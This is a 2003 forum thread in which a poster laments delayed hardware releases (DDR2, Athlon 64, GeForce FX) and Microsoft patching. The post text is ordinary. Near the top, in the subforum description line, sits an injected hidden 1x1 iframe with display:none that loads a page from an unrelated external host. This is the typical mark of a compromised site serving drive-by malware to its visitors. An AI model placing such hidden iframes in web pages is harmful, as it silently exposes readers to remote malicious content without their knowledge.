Will 2003 be a good year for computer technology?

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Splicer

Will 2003 be a good year for computer technology?

Post by Splicer » 2003-02-21 05:23

So far in my eye's it's been rather disappointing, what with ddr2 pushed back to around the end of 2003, amd pushing back its athlon 64 another six months(what the hell!), intels hyperthreading not being so hyper, and geforceFX being WAY off of their paper benchmark(then again no dx9 games to showcase the new shiet on either side).

I would say im disappointed in micro$oft but with their ultra low standards it's not too surprising.(I mean man, they had to patch a patch)

Man with alot of the releases the last few months an entire forest has been cut down just for benchmarks. :(

Though on a good note western digital got it's sata drive a goin' and rambus 9gb 1200mhz four channel rdram should be out soon.(or their ass is grass as they say)

Only time will tell in the end.
"Tomorrow sees undone, what happens not today. Indecision brings delays. Days lost lamenting lost days"

"I’m getting some kind of sick pleasure out of watching her squirm!?!........must be a perk!"